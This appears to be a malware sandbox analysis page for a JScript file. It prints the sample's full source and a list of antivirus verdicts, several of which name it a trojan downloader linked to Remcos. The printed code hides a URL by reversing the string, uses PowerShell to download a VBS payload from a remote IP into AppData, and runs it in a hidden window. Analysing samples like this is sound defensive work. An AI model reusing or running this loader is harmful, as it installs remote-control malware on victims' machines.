popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
var HvKPr = "todo.vbs"; //nome do arquivo que vai se executado ex teste.exe
var AfiMff0uIMMMUhQUQVF
AfiMff0uIMMMUhQUQVF = "$QS0W0FFBPFAH = [Environment]::GetFolderPath('ApplicationData') ;" ;
AfiMff0uIMMMUhQUQVF = AfiMff0uIMMMUhQUQVF + "$CCUahMFMHNFS = \'sbv.afivne/5.09.621.881//:ptth' ;" ;
AfiMff0uIMMMUhQUQVF = AfiMff0uIMMMUhQUQVF + "Start-BitsTransfer -Source ($CCUahMFMHNFS[-1..-$CCUahMFMHNFS.Length] -join \'\') -Destination ($QS0W0FFBPFAH + \'\\' + \'update.vbs\') ;" ;
AfiMff0uIMMMUhQUQVF = AfiMff0uIMMMUhQUQVF + "Rename-Item -Path ($QS0W0FFBPFAH + " + "\'\\" + HvKPr + "\')" + " -NewName $VBIoaMMFAhCAQ;" ;
//execute file
AfiMff0uIMMMUhQUQVF = AfiMff0uIMMMUhQUQVF + "[System.Diagnostics.Process]::Start($QS0W0FFBPFAH + \'\\' + \'update.vbs\') ;" ;
var oShell = new ActiveXObject("Shell.Application");
oShell.ShellExecute("powershell.exe", " -command " + AfiMff0uIMMMUhQUQVF , "", "open" , 0);
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.SAgent.4!c
tehtris Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Trojan.JS.Agent.GVD
Symantec ISB.Downloader!gen81
ESET-NOD32 JS/TrojanDownloader.Agent.ZJA
TrendMicro-HouseCall Trojan.JS.REMCOS.YXEFEZ
Avast JS:Generic-AE [Drp]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.Script.SAgent.gen
BitDefender Clean
NANO-Antivirus Trojan.Script.Heuristic-js.iacgm
ViRobot Clean
MicroWorld-eScan Clean
Tencent Js.Trojan-Downloader.Er.Mcnw
Sophos Clean
F-Secure Malware.JS/TrjDldr.MAD
DrWeb Clean
VIPRE Clean
TrendMicro Trojan.JS.REMCOS.YXEFEZ
FireEye Clean
Emsisoft Clean
GData Script.Trojan.Agent.6J9XNQ
Jiangmin Clean
Varist Clean
Avira JS/TrjDldr.MAD
MAX Clean
Antiy-AVL Clean
Kingsoft Script.Trojan.SAgent.gen
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Script.SAgent.gen
Microsoft Trojan:JS/Remcos.RVC!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Trojan-Downloader.JS.Agent
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG JS:Generic-AE [Drp]
Panda Clean
alibabacloud Trojan[downloader]:Javascript/SAgent.gyf
No IRMA results available.